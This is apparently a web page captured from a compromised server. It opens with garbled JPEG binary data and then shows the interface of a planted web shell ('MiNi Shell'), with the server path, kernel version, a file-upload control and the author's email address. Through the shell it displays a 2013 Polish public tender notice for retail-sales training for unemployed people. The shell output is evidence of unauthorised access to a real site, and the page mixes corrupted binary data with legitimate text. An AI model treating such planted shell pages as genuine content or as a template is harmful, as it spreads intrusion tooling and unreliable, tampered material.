JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131203/497724-N-2013.html

<p class="kh_header"><b>Sępólno Krajeńskie: Nowoczesny sprzedawca</b><br>
<b>Numer ogłoszenia: 497724 - 2013; data zamieszczenia: 03.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Tadeusza Kościuszki 11, 89-400 Sępólno Krajeńskie, woj. kujawsko-pomorskie, tel. 0-52 388 13 50, faks 0-52 388 53 67.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pup.sepolno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nowoczesny sprzedawca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa - organizacja i przeprowadzenie szkolenia dla 14 osób 
bezrobotnych w zakresie: Nowoczesny sprzedawca
2. Szczegółowy opis przedmiotu zamówienia:
a)	Przewidywany  termin wykonania zamówienia:  styczeń 2014 r.
b)	Szkolenie trwać musi 120 godzin zegarowych, w tym 48 godzin zegarowych zajęć praktycznych. Zajęcia praktyczne muszą zostać przeprowadzone w jednostkach handlowych.
c)	Przeciętna liczba godzin w tygodniu nie może być mniejsza niż 25 godzin zegarowych na osobę (godzina zegarowa zajęć teoretycznych liczy 60 minut i obejmuje zajęcia edukacyjne 45 minut oraz przerwę liczącą średnio 15 minut; 1 godzina zegarowa zajęć praktycznych równa się 60 minutom bez przerwy).
d)	Wspólny Słownik zamówień (CPV): 80530000-8 Usługi szkolenia zawodowego.
e)	Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników do pracy  sprzedawcy.
Program szkolenia musi obejmować między innymi poniższą tematykę:
-	Zasady BHP na stanowisku sprzedawcy.
-	Kultura i sylwetka zawodu sprzedawcy oraz elementy wizażu.
-	Zasady komunikacji w procesie sprzedaży.
-	Elementy towaroznawstwa.
-	Wypełnianie dokumentacji handlowej.
-	Gospodarka magazynowa.
-	Organizacja i techniki sprzedaży; typy klientów. 
-	Minimum sanitarne.
-	Obsługa różnych urządzeń wykorzystywanych w handlu: kasy fiskalne różnego typu, komputery, drukarki, czytniki kodów kreskowych, wagi, metkownice, numeratory, testery banknotów, terminale kart płatniczych, PIN Pady, systemy lojalnościowe, sprawdzarki cen, itp.
-	Obsługa komputerowych programów sprzedażowych wykorzystywanych w handlu.
-	Zasady ekspozycji, wizualizacji i aranżacji sklepu.
-	Obsługa klienta z wykorzystaniem aktywnych metod sprzedaży, elementów marketingu i reklamy.

f)	Szkolenie finansowane będzie ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI Rynek pracy otwarty dla wszystkich, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy, Tytuł projektu Młodzi aktywni. 
W związku z powyższym Wykonawca zobowiązany będzie do:
-  informowania osób o finansowaniu realizacji projektu przez Unię Europejską,
-  oznaczenia materiałów szkoleniowych,
- oznaczenia wszelkich dokumentów sporządzanych w ramach realizacji zamówienia (m.in. zaświadczenia o ukończeniu szkolenia),
- oznaczenia miejsca realizacji kursu.
g)	Zamawiający zastrzega sobie  możliwość skierowania mniejszej liczby osób z przyczyn niezależnych przez Zamawiającego.
h)	Termin realizacji przedmiotu zamówienia może ulec zmianie w zależności od terminu rozstrzygnięcia postępowania - wyboru Wykonawcy.
i)	Zamawiający zastrzega sobie prawo, że w przypadku nie przyznania środków finansowych na przedmiotowe szkolenie, szkolenie to może nie być zrealizowane.
j)	Program szkolenia (zakres i jakość) powinien wykorzystywać standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych, dostępnych w bazach danych prowadzonych przez MP i PS.
k)	Zajęcia muszą odbywać się w dni robocze od poniedziałku do piątku, w godzinach od 7.00 do 17.00 - do 8 godzin dziennie (z wyłączeniem dni wolnych od pracy).
l)	Wykonawca zobowiązany jest do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia oraz do niezwłocznego (po rozpoczęciu szkolenia) przedstawienia polisy NNW (następstw nieszczęśliwych wypadków) potwierdzającej obowiązkowe ubezpieczenie słuchaczy. Koszt ubezpieczenia Wykonawca wyszczególni w preliminarzu kosztów.
m)	Wykonawca zobowiązany jest do zabezpieczenia odpowiednich pomieszczeń do prowadzenia zajęć zgodnie z wymogami polskiego prawa (sale muszą być odpowiednio oświetlone, nagłośnione, muszą spełniać wymogi bhp, p. poż.  oraz posiadać zaplecze sanitarne).
n)	Wykonawca zobowiązany jest do skierowania uczestników kursu na badania lekarskie, jeżeli są wymagane oraz do sfinansowania tych badań oraz zobowiązany jest do przekazania Zamawiającemu informacji o wynikach badań niezwłocznie po ich otrzymaniu. Ewentualny koszt badań musi być wliczony w cenę oferty oraz wyszczególniony w preliminarzu kosztów.
o)	Wykonawca zobowiązany jest zapewnić nieodpłatnie środki ochrony każdemu kursantowi (skierowanemu przez Zamawiającego) oraz zobligować do ich stosowania jeżeli przepisy szczegółowe w zakresie bhp wymagają stosowania takich środków przy wykonywaniu zadań. Ewentualny koszt środków ochrony musi być wliczony w cenę oferty oraz wyszczególniony w preliminarzu kosztów.
p)	Do realizacji zamówienia Wykonawca zapewni uczestnikom odpowiednie materiały szkoleniowe, tj. długopis, co najmniej 60 kartkowy zeszyt lub notatnik, materiały dydaktyczne niezbędne do utrwalenia wiadomości, które po zakończeniu realizacji szkolenia przejdą na ich własność, teczkę lub segregator na otrzymywane materiały. Materiały należy rozdać uczestnikom szkolenia w pierwszym dniu szkolenia lub na bieżąco zgodnie z realizowanym tematem zajęć, a potwierdzenie ich odbioru Wykonawca przekaże Zleceniodawcy wraz z dokumentacją szkolenia. 
q)	Wykonawca zobowiązany jest zapewnić uczestnikom szkolenia bezpłatne zaplecze socjalne, na które składać się będzie: gorąca herbata, kawa, śmietanka, cukier, woda mineralna oraz słodki poczęstunek. Wskazane zaplecze musi być dostępne dla kursantów każdego dnia szkolenia.
r)	Wszystkie zajęcia muszą być prowadzone z wykładowcą / trenerem.
s)	Po zakończeniu szkolenia uczestnicy muszą uzyskać zaświadczenie o ukończeniu szkolenia zgodne z obowiązującymi przepisami. Po ukończeniu szkolenia Wykonawca zobowiązuje się dostarczyć Zamawiającemu kopię zaświadczeń w ciągu 5 dni od dnia zakończenia szkolenia. 
3. Miejsce szkolenia: powiat sępoleński..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonych do oferty: 
- ksera wpisu do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej wraz z informacją, że jest on aktualny na dzień składania oferty lub oświadczenia - załącznik nr 12. 
- licencji, zezwoleń, koncesji, itp.  na prowadzenie szkoleń - jeżeli posiada.
Wykonawca potwierdzi spełnianie tego warunku, jeżeli dostarczy wymienione oświadczenie oraz  dokumenty. Zamawiający zastrzega sobie możliwość zweryfikowania złożonego oświadczenia o dokonaniu wpisu z informacją na stronie internetowej http www.ris.praca.gov.pl.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług 
w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności szkoleniowej jest krótszy  to w tym okresie usług szkoleniowych z zakresu przedmiotu zamówienia wraz z załączeniem dokumentów potwierdzających, że te usługi zostały lub są wykonywane należycie - według załącznika nr 7.
Wykonawca potwierdzi spełnianie tego warunku, jeżeli wykaże iż przeprowadził należycie co najmniej 1 szkolenie grupowe odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia i przedstawi dokumenty o należytym wykonaniu tych usług. Zamawiający za szkolenie grupowe uzna szkolenie, w którym brało udział  co najmniej 6 osób jednocześnie, a nazwa szkolenia zawierała co najmniej jeden człon sprzedawca; handlowiec.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - według załącznika nr 9. Wykaz powinien zawierać informacje na temat sali szkoleniowej, jej wyposażenia, miejsca prowadzenia zajęć praktycznych, jeżeli wymaga tego zakres szkolenia oraz zaplecza sanitarnego. Wymagana jest również informacja na temat dysponowania potencjałem technicznym  na potrzeby szkolenia. 
Wykonawca potwierdzi spełnienie tego warunku, jeżeli wykaz będzie zawierał  pomieszczenia, plac dla wymienionej w przedmiocie zamówienia ilości osób, zlokalizowane w odpowiednio przystosowanym budynku, miejscu przeprowadzenia zajęć, wyposażone w odpowiedni sprzęt i pomoce dydaktyczne niezbędne do przeprowadzenia szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki wraz z pisemnym oświadczeniem o udostępnieniu tych zasobów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych 
za świadczenie usług - załącznik nr 8 oraz oświadczenia, że osoby, które będą uczestniczyć 
w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - załącznik nr 4.
Wykonawca potwierdzi spełnianie warunku, gdy wykaz będzie zawierał  co najmniej 3 osoby posiadające odpowiednie kwalifikacje, wykształcenie, przygotowanie, niezbędną wiedzę oraz doświadczenie do prawidłowej realizacji przedmiotu zamówienia wraz z informacją o podstawie do  dysponowania tymi osobami oraz dołączy oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty oświadczenia Wykonawcy - załącznik nr 5 o znajdowaniu się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Wykonawca potwierdzi spełnianie warunku  załączając do oferty  stosowne  oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>ksero wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej wraz z informacją, że jest on aktualny na dzień składania oferty lub oświadczenie - załącznik nr 12, licencje, zezwolenia, koncesje, itp.,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy - 20</li>
<li>3 - Posiadanie certyfikatów jakości usług - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W szczególnie uzasadnionych przypadkach Zamawiający przewiduje możliwość wprowadzenia zmian w umowie dotyczących:
a)	zmniejszenia liczby osób, terminu i kosztu w trakcie jego realizacji w przypadku wystąpienia sytuacji, których nie można  było przewidzieć  w chwili zawarcia umowy - koszty szkolenia będą wówczas proporcjonalne do liczby osób lub stopnia wykonania zamówienia,
b)	zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika ze zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy. W przypadku zmiany wykładowcy Wykonawca zobowiązany jest zapewnić, aby nowy wykładowca posiadał co najmniej kwalifikacje, wykształcenie i doświadczenie osoby, która została wykazana w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia
       c) zmiany miejsca realizacji szkolenia wymienionego w ofercie, gdy konieczność jej dokonania wynika z przyczyn, których nie można było przewidzieć w dniu zawarcia umowy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w SIWZ,
     d) zmiany harmonogramu zajęć i innej dokumentacji szkolenia, gdy konieczność jej dokonania wynika z przyczyn, których nie można było przewidzieć w dniu zawarcia umowy - w uzasadnionych przypadkach i za zgodą Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.sepolno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. Tadeusza Kościuszki 11
89-400 Sępólno Krajeńskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 10:00, miejsce: Powiatowy Urząd Pracy
ul. Tadeusza Kościuszki 11
89-400 Sępólno Krajeńskie
sekretariat II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie finansowane będzie ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI Rynek pracy otwarty dla wszystkich, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy, Tytuł projektu Młodzi aktywni..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com